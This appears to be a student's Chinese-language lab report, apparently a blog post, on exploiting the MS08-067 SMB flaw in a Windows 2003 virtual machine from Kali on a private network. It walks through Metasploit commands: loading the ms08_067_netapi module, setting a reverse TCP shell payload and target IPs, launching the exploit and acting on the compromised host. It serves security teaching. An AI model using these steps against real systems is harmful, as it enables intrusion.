20145333茹翔 Exp5 MS08_067漏洞测试

20145333茹翔 Exp5 MS08_067漏洞测试

实验过程

  • IP:kali:192.168.31.177windows 2003 :192.168.31.223
  • 使用命令msfconsole进入控制台,可以使用search ms08_067查看相关信息。
    20145333茹翔 Exp5 MS08_067漏洞测试

  • 得到相应模块名之后,我们使用该模块,使用 show payloads ,确定攻击载荷。
    20145333茹翔 Exp5 MS08_067漏洞测试

  • 使用命令 use exploit/windows/smb/ms08_067_netapi

  • set payload generic/shell_reverse_tcp选择playoad,并查看相关信息。
    20145333茹翔 Exp5 MS08_067漏洞测试

  • 使用命令show options确定,之后按照显示出的信息进行修改,我们需要设置好监听ip,监听端口以及攻击Ip
    20145333茹翔 Exp5 MS08_067漏洞测试

  • 我们可以通过修改target的值,来选择我们具体想要攻击的计算机系统(通常可以采用自动选取,即target设置为0)
    20145333茹翔 Exp5 MS08_067漏洞测试

  • 使用命令exploit发起攻击,实验结果如下图
    20145333茹翔 Exp5 MS08_067漏洞测试

  • 使用ipconfig命令查看
    20145333茹翔 Exp5 MS08_067漏洞测试

  • 新建文件夹20145333
    20145333茹翔 Exp5 MS08_067漏洞测试

20145333茹翔 Exp5 MS08_067漏洞测试

上一篇:Vue知识点


下一篇:2018-2019 20165232 Exp5 MSF基础应用